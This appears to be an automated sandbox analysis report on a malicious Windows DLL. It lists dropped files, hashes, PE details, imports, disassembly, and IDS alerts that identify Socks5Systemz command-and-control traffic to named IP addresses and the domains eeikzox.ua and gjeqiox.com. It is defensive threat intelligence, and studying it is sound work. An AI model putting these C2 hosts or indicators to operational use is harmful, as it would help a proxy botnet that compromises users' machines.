Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.9.3.6.3.8.0.7.0.2.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.9.3.6.3.8.4.9.2.0.9.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.c.a.6.b.d.-.f.2.e.7.-.4.0.a.2.-.8.1.8.a.-.3.b.d.e.4.9.c.1.0.1.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.6.3.9.a.a.7.-.b.1.9.4.-.4.a.9.2.-.8.f.8.d.-.6.a.1.c.f.b.f.f.0.b.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.4.-.7.5.8.e.-.3.7.8.2.8.2.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1031.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8318
Entropy (8bit):	3.6941783268308765
Encrypted:	false
SSDEEP:	192:R6l7wVeJrC6d46YPZ6JkgmfTcJJzpr+89br+sfCS5m:R6lXJ+6d46YR66gmfTcJJpr9fE
MD5:	10507B46A524A8B9128E71AA468005C8
SHA1:	A1E2EEB42D3AD57A48DE6E838D67F747C7897BB1
SHA-256:	9D0ECF398CE1555F3E2A00CAFAA4CC6F86997CF532B4BCE94356155689D1AF38
SHA-512:	E0DA4E0F6B37ADA7E67BF24A3FAE72D05B68B1BC495E898D3814BA1107B1FA2E8BCE36B372AEF0F36F514BC86A8EB1DB25D3D49C7E56FF4055AE459F8311521E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1051.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4706
Entropy (8bit):	4.508357442357936
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9epWpW8VYuYm8M4JCdPEiFX+q8/evFHHGScS/d:uIjfPI7UY7VKJCPHJ3/d
MD5:	880504E4826CBE73A8274EA23E48366A
SHA1:	36B523C16E5136DA07F5734A4159FE103A7D521B
SHA-256:	13AA4C86C06277D746097C346F3BD1D90C660D6B135320CD0DC3F0A420939C74
SHA-512:	C0DCD03EE9A6F11A52AC62D13FF55D179C32F2B88D0E804B8BEB1FEB469048D41EB02683A2D7956389122EB43AF9A2A5CF0661125FB595D1FB3ADC93DE3B834D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="631609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF46.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Dec 14 23:47:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	57266
Entropy (8bit):	2.1580569346960994
Encrypted:	false
SSDEEP:	192:colh6ONziHp36bO5H4gOoVubtQV8qYrGDyBG4lvCY7kbA6NAgTgSJv5:l6KziHp36i5H9RUaKBnG4MY7kk6ZggB
MD5:	162083EDD928EE9F66BC014CD73BD97B
SHA1:	A185AD32F8E32599CB0362A93EBDFA15EDC0E0C4
SHA-256:	51ABDA0F2BD40905A16C6E71D7D92E978E50A98C95D3BB6120C98558CEDB1CBF
SHA-512:	C083658E00FCF5EC2B36E5C00DB8CF1C32E3832107C2087BEEA5968245123068133D3C72D29ED8961ABE80607C45FFB3BE6DCC2796BDCA91BC8B8DE7578D334C
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........^g....................................4....3..........T.......8...........T...........`#..R...........T...........@...............................................................................eJ..............GenuineIntel............T.............^g.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\rc.dat

Download File

Process:	C:\Windows\System32\loaddll32.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:M:M
MD5:	4352D88A78AA39750BF70CD6F27BCAA5
SHA1:	3C585604E87F855973731FEA83E21FAB9392D2FC
SHA-256:	67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
SHA-512:	EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....

C:\ProgramData\resource.dat

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.7676871649903405
Encrypted:	false
SSDEEP:	3:rFAE31H9WGGLdDrC3pkHW:rFllUNBm3pkHW
MD5:	259056BBC767F630B6B067ED5D73E1A9
SHA1:	B6CD12A34A9F98D15F2E4C62B8D2BC9C59750ED0
SHA-256:	84D5A998635571430B2F71DE3A65B6BB9DBF40E2A7925EE3D7152F9818F8199D
SHA-512:	3AC44FA4BD5F82FFBE46A89F9A6DEDB00537AABD6AD021F64A1DC32058548CB00E74CB111E9611D72019CFC79430220F5BD5072B0DBB6717DE59D15DF4355EFA
Malicious:	false
Preview:	fe0670bf22e56efef3dcb9c43e7a2b8f662f3ccf28f6a30e537a9ba072d59a73

C:\ProgramData\ts.dat

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:lmtn:li
MD5:	CFAB2BABE03C15399B136DE70E1EB294
SHA1:	0C7F47FFEDB5A9F172EF1380B3307D66340B3C95
SHA-256:	061A3D3D1D5AE8AA0D86E03772C838008675E64D6EC494AC787FE2E0A1D215F7
SHA-512:	6BFA7355A6DCD75ED9746E161F531C173421FDC5454F3E528415BF9472BE093862211B3DB7EE8862086711D0AC4F54E02651B0951821FECCFE96E7C96395C490
Malicious:	false
Preview:	..^g....

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466233813774183
Encrypted:	false
SSDEEP:	6144:FIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbG:mXD94+WlLZMM6YFHT+G
MD5:	FD132835EC2055620F4A6567681C1D60
SHA1:	33CC1BA1606417A47B2C1B27A5AEE0727CA508B4
SHA-256:	B5B318159728822F4EABA5B04EE17E5E1FB5EF62F22AD334A105E65FAD66473B
SHA-512:	9921D132CD23574F6D044140565693F777C92832F80C93AD88C1667BC3820347C67CF4C14DE0EA009C40760385DD7E55BA9B67A559325C45BA640F3A10AC9CE3
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..{..N................................................................................................................................................................................................................................................................................................................................................l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.592930684908829
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cNF6fXdjPw.dll
File size:	676'387 bytes
MD5:	76436512e3e3a9dca38f5eaf312fe323
SHA1:	503af6ad7617f847abbe509a907944f0e9213505
SHA256:	7d4ea4e69143df3f0f8fb9e4dee13c5251c4b1810d6b3a8626195906f00c0a49
SHA512:	aab595de7a3af9a3e7c480f953b392f42965348ffcda6a410eb990ae2c11c5a87f975b2ad2c34a147767b14325c60117af64f2bcea2813a7fbcee94ddfc951d9
SSDEEP:	12288:oIsMQVdsxSoqFsUzAbRb7aZJhztomX9mFu4Ou1GN3/k3jQlVUihjxWBZlUAxwqwX:nDQVdsxSoqFsGA6rX9mFujeMwQljhjxb
TLSH:	19E4D121B652A17DC6AF1672481A760752FD7BE04B70DD5BEF8C2D1C8BB74C1B23221A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%...w...%...w>._%...]?..%...w?..%...]M..%...%..Q%...];..%...w...%...]...%..Rich.%..........PE..L.....be...........

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x1001c462
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6562FADC [Sun Nov 26 07:59:24 2023 UTC]
TLS Callbacks:	0x1001a9a0
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	f0e11ecd3bbee7b4aa223cc34c18cd2a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F6DE91DD7E7h
call 00007F6DE91E5B26h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F6DE91DD7ECh
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 1003AD78h
call 00007F6DE91E2644h
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F6DE91DD7EEh
cmp dword ptr [1004004Ch], esi
je 00007F6DE91DD8CAh
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F6DE91DD7E7h
cmp esi, 02h
jne 00007F6DE91DD817h
mov ecx, dword ptr [10031520h]
test ecx, ecx
je 00007F6DE91DD7EEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F6DE91DD897h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F6DE91DD5F6h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F6DE91DD880h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F6DE91C9AA1h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F6DE91DD80Ah
test edi, edi
jne 00007F6DE91DD806h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F6DE91C9A89h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F6DE91DD5BCh
mov eax, dword ptr [10031520h]
test eax, eax
je 00007F6DE91DD7E9h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 UPD3 build 30723
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD3 build 30723

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b834	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x45000	0x3124	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x369f8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x369b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x24c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e4f8	0x2e600	0d6232af30b93c5786da17b063283599	False	0.4911188089622642	data	6.518835744837128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x30000	0xc40e	0xc600	edc7926f247568444577b89da61e0d0d	False	0.3610124684343434	data	4.776781540888529	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x56bc	0x3000	257c83e0233e8e4167e1306304b66b32	False	0.234619140625	DOS executable (block device driver)	4.836826989273863	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x43000	0x2	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x44000	0x1e0	0x200	595c0909459d4e76bb3df3fe5dfb1ca0	False	0.52734375	data	4.720822661998389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x45000	0x3124	0x3200	cb45b4d6dce16e3cc09ca49b9656f3af	False	0.718671875	data	6.549975712532299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.vlizer	0x49000	0x63e00	0x63c23	6cd4be77e31019358e268978c34aa901	False	0.9652285425502495	data	7.949279852498222	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x44060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
WININET.dll	InternetCloseHandle, InternetOpenA, InternetSetOptionA, InternetReadFile, InternetOpenUrlA
DNSAPI.dll	DnsFree, DnsQuery_A
KERNEL32.dll	HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateFileA, lstrlenA, TlsGetValue, SetWaitableTimer, InterlockedIncrement, GetQueuedCompletionStatus, InterlockedDecrement, QueryPerformanceCounter, InterlockedCompareExchange, SleepEx, WriteFile, InitializeCriticalSection, TlsSetValue, TerminateThread, InitializeCriticalSectionAndSpinCount, GetTickCount, GetProcessHeap, HeapAlloc, CreateEventA, GetCurrentProcess, HeapFree, WaitForSingleObject, SetEvent, Sleep, GetSystemTimeAsFileTime, LeaveCriticalSection, CreateFileW, lstrcatA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, QueueUserAPC, EnterCriticalSection, InterlockedExchangeAdd, LocalAlloc, PostQueuedCompletionStatus, WaitForMultipleObjects, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, lstrcatW, DeleteCriticalSection, GetVersionExA, TlsAlloc, CloseHandle, CreateWaitableTimerA, LocalFree, TlsFree, lstrcpyW, DeleteFileA, CreateThread, FreeLibrary, GetWindowsDirectoryA, LoadLibraryA, DeviceIoControl, GetFileTime, GetStartupInfoW, TerminateProcess, ReadFile, VirtualQuery, GetModuleFileNameW, GetStdHandle, WideCharToMultiByte, SetEndOfFile, FlushFileBuffers, WriteConsoleW, SetStdHandle, HeapReAlloc, AreFileApisANSI, OutputDebugStringW, SetFilePointerEx, LCMapStringW, GetStringTypeW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetFileType, GetConsoleCP, ReadConsoleW, GetConsoleMode, GetModuleHandleW, FormatMessageA, OpenEventA, ReleaseSemaphore, GetCurrentProcessId, GetCurrentThreadId, ResetEvent, ResumeThread, EncodePointer, DecodePointer, ExitThread, LoadLibraryExW, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, ExitProcess, GetModuleHandleExW
USER32.dll	wsprintfA
SHELL32.dll	SHGetSpecialFolderPathW, SHGetSpecialFolderPathA
WS2_32.dll	ioctlsocket, WSAStringToAddressA, connect, inet_ntoa, WSAStartup, ntohl, inet_addr, htonl, getaddrinfo, WSARecv, WSASend, select, WSAGetLastError, htons, ntohs, getsockname, shutdown, setsockopt, freeaddrinfo, WSASetLastError, closesocket, getsockopt, WSASocketA, WSACleanup

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T00:48:27.168072+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49759	94.232.249.187	80	TCP
2024-12-15T00:48:27.168072+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49759	94.232.249.187	80	TCP
2024-12-15T00:48:40.305084+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49787	94.232.249.187	80	TCP
2024-12-15T00:48:40.305084+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49787	94.232.249.187	80	TCP
2024-12-15T00:48:40.305084+0100	2829008	ETPRO MALWARE W32/Teamspy Variant Checkin	1	192.168.2.4	49787	94.232.249.187	80	TCP
2024-12-15T00:48:53.445782+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49817	94.232.249.187	80	TCP
2024-12-15T00:48:53.445782+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49817	94.232.249.187	80	TCP
2024-12-15T00:49:12.194727+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:49:12.194727+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:49:16.187683+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:49:16.187683+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:50:17.587473+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50013	185.237.206.129	80	TCP
2024-12-15T00:50:17.587473+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50013	185.237.206.129	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:48:18.891561031 CET	49759	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:19.011368990 CET	80	49759	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:19.011513948 CET	49759	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:19.011759043 CET	49759	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:19.131433964 CET	80	49759	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:27.168071985 CET	49759	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:32.180754900 CET	49787	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:32.300793886 CET	80	49787	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:32.300981998 CET	49787	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:32.301275015 CET	49787	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:32.421298981 CET	80	49787	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:40.305083990 CET	49787	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:45.321240902 CET	49817	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:45.441042900 CET	80	49817	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:45.441153049 CET	49817	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:45.441265106 CET	49817	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:48:45.560966015 CET	80	49817	94.232.249.187	192.168.2.4
Dec 15, 2024 00:48:53.445781946 CET	49817	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:49:10.761219025 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:10.881026983 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:49:10.881153107 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:10.881289959 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:11.001348972 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:49:12.194669962 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:49:12.194726944 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:12.196276903 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:49:12.316220045 CET	1074	49878	45.155.250.225	192.168.2.4
Dec 15, 2024 00:49:12.318295002 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:49:12.318389893 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:49:12.438102961 CET	1074	49878	45.155.250.225	192.168.2.4
Dec 15, 2024 00:49:12.438184977 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:49:12.557929039 CET	1074	49878	45.155.250.225	192.168.2.4
Dec 15, 2024 00:49:13.652512074 CET	1074	49878	45.155.250.225	192.168.2.4
Dec 15, 2024 00:49:13.695626020 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:49:15.664921999 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:15.784746885 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:49:16.187566042 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:49:16.187683105 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:49:18.383460999 CET	49878	1074	192.168.2.4	45.155.250.225
Dec 15, 2024 00:50:16.196283102 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:50:16.196599007 CET	50013	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:50:16.316482067 CET	80	50013	185.237.206.129	192.168.2.4
Dec 15, 2024 00:50:16.316592932 CET	50013	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:50:16.316725969 CET	80	49874	185.237.206.129	192.168.2.4
Dec 15, 2024 00:50:16.316783905 CET	50013	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:50:16.316804886 CET	49874	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:50:16.436683893 CET	80	50013	185.237.206.129	192.168.2.4
Dec 15, 2024 00:50:17.587385893 CET	80	50013	185.237.206.129	192.168.2.4
Dec 15, 2024 00:50:17.587472916 CET	50013	80	192.168.2.4	185.237.206.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:48:18.592104912 CET	60558	53	192.168.2.4	45.155.250.90
Dec 15, 2024 00:48:18.841063023 CET	53	60558	45.155.250.90	192.168.2.4
Dec 15, 2024 00:48:58.462383032 CET	58765	53	192.168.2.4	81.31.197.8
Dec 15, 2024 00:48:59.477250099 CET	58765	53	192.168.2.4	81.31.197.8
Dec 15, 2024 00:49:00.492798090 CET	58765	53	192.168.2.4	81.31.197.8
Dec 15, 2024 00:49:02.493048906 CET	58765	53	192.168.2.4	81.31.197.8
Dec 15, 2024 00:49:06.508526087 CET	58765	53	192.168.2.4	81.31.197.8
Dec 15, 2024 00:49:10.509433985 CET	63248	53	192.168.2.4	45.155.250.90
Dec 15, 2024 00:49:10.759042978 CET	53	63248	45.155.250.90	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 00:48:18.592104912 CET	192.168.2.4	45.155.250.90	0x2dfe	Standard query (0)	eeikzox.ua	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:48:58.462383032 CET	192.168.2.4	81.31.197.8	0xa764	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:48:59.477250099 CET	192.168.2.4	81.31.197.8	0xa764	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:49:00.492798090 CET	192.168.2.4	81.31.197.8	0xa764	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:49:02.493048906 CET	192.168.2.4	81.31.197.8	0xa764	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:49:06.508526087 CET	192.168.2.4	81.31.197.8	0xa764	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false
